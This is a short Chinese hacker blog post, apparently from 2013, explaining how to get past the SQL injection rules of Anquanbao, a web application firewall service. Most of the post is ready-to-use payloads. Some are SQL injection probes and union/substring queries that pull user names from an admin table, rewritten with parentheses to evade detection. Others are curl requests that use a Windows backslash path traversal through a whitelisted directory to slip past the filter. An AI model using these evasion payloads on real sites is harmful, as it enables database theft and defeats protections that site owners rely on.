记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

安全宝几个注入漏洞规则绕过方法

2013-01-19 18:07
地址均未编码

利用反向代理和真实执行环境的
1 对sql层面解析差异导致
2 对文件系统层面解析差异导致

1 对sql层面的解析差异导致
判断:
http://www.anquanbao.com/?id=1 and(1=1)
http://www.anquanbao.com/?id=1 and(1)=(1)
http://www.anquanbao.com/?id=1 and 1
http://www.anquanbao.com/?id=1 and true

利用:
触发:http://www.anquanbao.com/?id=1 and '1'=(select substr(user,1,1) from admin limit 1)
绕过:http://www.anquanbao.com/?id=(1)and'r'=(select(substr(user,1,1))from admin limit 1)

触发:http://www.anquanbao.com/?id=1 union(select user from admin)
绕过:http://www.anquanbao.com/?id=(1)union(select(user)from admin)

2 对文件系统层面解析差异导致
主要利用的是windows和linux文件系统路径的差异
安全宝提供白名单功能,如果是win主机,则可以利用一个白名单项攻击网站任意页面。

这里白名单为/test/目录
触发:curl -v 'www.wtf.tk/Pages/Index.aspx?id=1+and+1=1'
绕过:curl -v 'www.wtf.tk/test/..\Pages/Index.aspx?id=1+and+1=1'
知识来源: www.mcbang.com/article-15254-1.html

阅读:177434 | 评论:1 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“安全宝几个注入漏洞规则绕过方法”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云